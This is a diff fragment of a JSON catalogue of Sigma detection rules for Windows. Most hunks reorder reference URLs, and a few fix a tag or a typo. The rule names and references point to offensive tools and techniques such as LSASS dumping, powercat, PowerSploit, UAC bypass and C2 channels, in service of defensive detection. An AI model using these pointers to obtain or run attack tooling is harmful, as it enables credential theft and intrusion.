"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ @@ -34320,8 +34320,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" ], "tags": [ @@ -34729,8 +34729,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "Personal research, statistical analysis", "https://lolbas-project.github.io", + "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml" ], "tags": [ @@ -34787,8 +34787,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "Personal research, statistical analysis", "https://lolbas-project.github.io", + "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml" ], "tags": [ @@ -35033,8 +35033,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml" ], "tags": [ @@ -35311,8 +35311,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ @@ -35470,8 +35470,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://cydefops.com/vscode-data-exfiltration", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_vscode_tunnel_connection.yml" ], @@ -35915,8 +35915,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" ], "tags": [ @@ -35993,8 +35993,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ @@ -36027,9 +36027,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files", "https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt", + "https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files", + "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_crypto_mining_pools.yml" ], "tags": [ @@ -36212,8 +36212,8 @@ "logsource.product": "windows", "refs": [ "https://cydefops.com/devtunnels-unleashed", - "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security", + "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_devtunnel_connection.yml" ], "tags": [ @@ -36354,8 +36354,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec_http.yml" ], "tags": [ @@ -36534,11 +36534,11 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ + "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/", + "https://youtu.be/n2dFlSaBBKo", "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/", "https://github.com/looCiprian/GC2-sheet", - "https://youtu.be/n2dFlSaBBKo", "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf", - "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_google_api_non_browser_access.yml" ], "tags": [ @@ -36605,8 +36605,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://megatools.megous.com/", "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://megatools.megous.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_mega_nz.yml" ], "tags": [ @@ -36639,8 +36639,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml" ], "tags": [ @@ -36783,10 +36783,10 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", - "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md", + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml" ], "tags": [ @@ -36887,8 +36887,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], "tags": [ @@ -36921,9 +36921,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://ngrok.com/blog-post/new-ngrok-domains", "https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf", "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://ngrok.com/blog-post/new-ngrok-domains", "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok.yml" ], @@ -36959,11 +36959,11 @@ "logsource.product": "windows", "refs": [ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", - "https://github.com/kleiton0x00/RedditC2", - "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al", "https://twitter.com/kleiton0x7e/status/1600567316810551296", + "https://github.com/kleiton0x00/RedditC2", "https://content.fireeye.com/apt-41/rpt-apt41", + "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al", + "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dead_drop_resolvers.yml" ], "tags": [ @@ -37004,11 +37004,11 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://twitter.com/M_haggis/status/900741347035889665", "https://twitter.com/M_haggis/status/1032799638213066752", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml" ], "tags": [ @@ -37067,13 +37067,13 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", - "https://en.wikipedia.org/wiki/IExpress", "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", + "https://en.wikipedia.org/wiki/IExpress", + "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sed_file_creation.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -37102,12 +37102,12 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://www.google.com/search?q=procdump+lsass", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/helpsystems/nanodump", + "https://www.google.com/search?q=procdump+lsass", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/CCob/MirrorDump", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/helpsystems/nanodump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml" ], "tags": [ @@ -37140,9 +37140,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml" ], "tags": [ @@ -37243,8 +37243,8 @@ "refs": [ "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/GossiTheDog/HiveNightmare", - "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/FireFart/hivenightmare/", + "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml" ], "tags": [ @@ -37302,9 +37302,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml" ], "tags": [ @@ -37354,11 +37354,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://twitter.com/luc4m/status/1073181154126254080", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ @@ -37424,8 +37424,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1465282548494487554", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" ], "tags": [ @@ -37538,8 +37538,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", + "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml" ], "tags": [ @@ -37563,12 +37563,12 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", - "https://twitter.com/MaD_c4t/status/1623414582382567424", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", + "https://twitter.com/MaD_c4t/status/1623414582382567424", "https://labs.withsecure.com/publications/detecting-onenote-abuse", - "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/", "https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/", + "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/", + "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml" ], "tags": [ @@ -37591,10 +37591,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://pentestlab.blog/tag/ntds-dit/", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml" ], "tags": [ @@ -37628,8 +37628,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/fox-it/LDAPFragger", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml" ], "tags": [ @@ -37740,11 +37740,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://twitter.com/luc4m/status/1073181154126254080", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ @@ -37810,10 +37810,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/", - "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks", "https://github.com/Yaxser/Backstab", "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer", + "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks", + "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml" ], "tags": [ @@ -37913,8 +37913,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/Porchetta-Industries/CrackMapExec", "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/Porchetta-Industries/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml" ], "tags": [ @@ -38021,8 +38021,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "Internal Research", "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", + "Internal Research", "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml" ], @@ -38122,10 +38122,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "http://addbalance.com/word/startup.htm", "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", "https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions", - "http://addbalance.com/word/startup.htm", + "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml" ], "tags": [ @@ -38351,9 +38351,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76", "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form", - "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml" ], @@ -38746,11 +38746,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", - "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", "https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/", - "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", "https://twitter.com/pfiatde/status/1681977680688738305", + "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", + "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", + "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml" ], "tags": [ @@ -38784,9 +38784,9 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], @@ -38854,26 +38854,26 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/adrecon/AzureADRecon", - "https://github.com/besimorhino/powercat", - "https://github.com/samratashok/nishang", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://github.com/adrecon/ADRecon", - "https://github.com/Kevin-Robertson/Powermad", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/HarmJ0y/DAMP", + "https://github.com/adrecon/AzureADRecon", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/samratashok/nishang", + "https://github.com/NetSPI/PowerUpSQL", + "https://github.com/Kevin-Robertson/Powermad", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/adrecon/ADRecon", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/besimorhino/powercat", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -38906,9 +38906,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ @@ -39083,8 +39083,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/tifkin_/status/1321916444557365248", "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" ], "tags": [ @@ -39534,7 +39534,7 @@ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/05/02", "falsepositive": [ - "System administrators managing certififcates." + "System administrators managing certificates." ], "filename": "file_event_win_susp_pfx_file_creation.yml", "level": "medium", @@ -39610,10 +39610,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -39647,8 +39647,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml" ], "tags": [ @@ -39682,8 +39682,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", - "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], 